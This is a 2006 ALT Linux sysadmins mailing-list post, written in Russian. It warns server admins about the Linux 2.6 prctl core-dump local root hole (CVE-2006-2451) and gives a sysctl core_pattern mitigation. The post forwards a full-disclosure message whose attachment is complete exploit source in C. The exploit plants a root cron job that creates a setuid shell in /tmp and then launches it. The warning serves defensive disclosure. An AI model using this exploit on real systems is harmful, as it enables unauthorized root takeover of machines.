From: Michael Shigorin <mike@osdn.org.ua> To: sysadmins@lists.altlinux.org Subject: [Sysadmins] Fwd: Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t Exploit ( BID 18874 / CVE-2006-2451 ) Date: Thu, 13 Jul 2006 12:44:16 +0300 Message-ID: <20060713094416.GQ26570@osdn.org.ua> (raw) [-- Attachment #1.1: Type: text/plain, Size: 435 bytes --] Здравствуйте. Напоминаю тем, у кого linux-2.6 на серверах, что в 2.6.13 до 2.6.17.4 или 2.6.16.24 может быть незаткнут local root и эксплойт уже опубликован. Проверено, что и от него помогает иметь в /etc/sysctl.conf kernel.core_pattern = /dev/null и соответственно в рантайме sysctl -w kernel.core_pattern=/dev/null -- ---- WBR, Michael Shigorin <mike@altlinux.ru> ------ Linux.Kiev http://www.linux.kiev.ua/ [-- Attachment #1.2: Type: message/rfc822, Size: 4749 bytes --] [-- Attachment #1.2.1.1: Type: text/plain, Size: 645 bytes --] -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Maybe this is obvious for Paul Starzetz (as well as many other people) but full-disclosure is not really "full" without exploit code. Working exploit attached. You can also download it from: http://www.rs-labs.com/exploitsntools/rs_prctl_kernel.c Greetz to !dSR ppl :-) - -- Saludos, - -Roman PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742 [Key ID: 0xEAD56742. Available at KeyServ] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (MingW32) iD8DBQFEtD815H+KferVZ0IRAjhKAKCtHnTCwV0D/kH3dt0HItQUPZ/JegCglaQM vO8VFJyxf+EXy2buqTK4kVM= =dzRm -----END PGP SIGNATURE----- [-- Attachment #1.2.1.2: rs_prctl_kernel.c --] [-- Type: text/plain, Size: 1684 bytes --] /*****************************************************/ /* Local r00t Exploit for: */ /* Linux Kernel PRCTL Core Dump Handling */ /* ( BID 18874 / CVE-2006-2451 ) */ /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ /* By: */ /* - dreyer <luna@aditel.org> (main PoC code) */ /* - RoMaNSoFt <roman@rs-labs.com> (local root code) */ /* [ 10.Jul.2006 ] */ /*****************************************************/ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); printf("By: dreyer & RoMaNSoFt\n"); printf("[ 10.Jul.2006 ]\n\n"); corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); printf("[*] Creating Cron entry\n"); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); sleep(62); printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); system("/tmp/sh -i"); } [-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]
next reply other threads:[~2006-07-13 9:44 UTC|newest] Thread overview: 11+ messages / expand[flat|nested] mbox.gz Atom feed top 2006-07-13 9:44 Michael Shigorin [this message] 2006-07-13 9:50 ` Alexey I. Froloff 2006-07-13 10:48 ` Dmitry V. Levin 2006-07-13 21:01 ` Michael Shigorin 2006-07-13 21:12 ` Dmitry V. Levin 2006-07-13 21:27 ` Michael Shigorin 2006-07-13 21:53 ` Sergey V Kovalyov 2006-07-13 21:57 ` Sergey V Kovalyov 2006-07-14 5:55 ` Alexey I. Froloff 2006-07-13 11:03 ` Vadim Gusev 2006-07-20 10:11 ` Dmitry Vodennikov
Reply instructions: You may reply publicly to this message via plain-text email using any one of the following methods: * Save the following mbox file, import it into your mail client, and reply-to-all from there: mbox Avoid top-posting and favor interleaved quoting: https://en.wikipedia.org/wiki/Posting_style#Interleaved_style * Reply using the --to, --cc, and --in-reply-to switches of git-send-email(1): git send-email \ --in-reply-to=20060713094416.GQ26570@osdn.org.ua \ --to=mike@osdn.org.ua \ --cc=shigorin@gmail.com \ --cc=sysadmins@lists.altlinux.org \ /path/to/YOUR_REPLY https://kernel.org/pub/software/scm/git/docs/git-send-email.html * If your mail client supports setting the In-Reply-To header via mailto: links, try the mailto: link
ALT Linux sysadmins discussion This inbox may be cloned and mirrored by anyone: git clone --mirror http://lore.altlinux.org/sysadmins/0 sysadmins/git/0.git # If you have public-inbox 1.1+ installed, you may # initialize and index your mirror using the following commands: public-inbox-init -V2 sysadmins sysadmins/ http://lore.altlinux.org/sysadmins \ sysadmins@lists.altlinux.org sysadmins@lists.altlinux.ru sysadmins@lists.altlinux.com public-inbox-index sysadmins Example config snippet for mirrors. Newsgroup available over NNTP: nntp://lore.altlinux.org/org.altlinux.lists.sysadmins AGPL code for this site: git clone https://public-inbox.org/public-inbox.git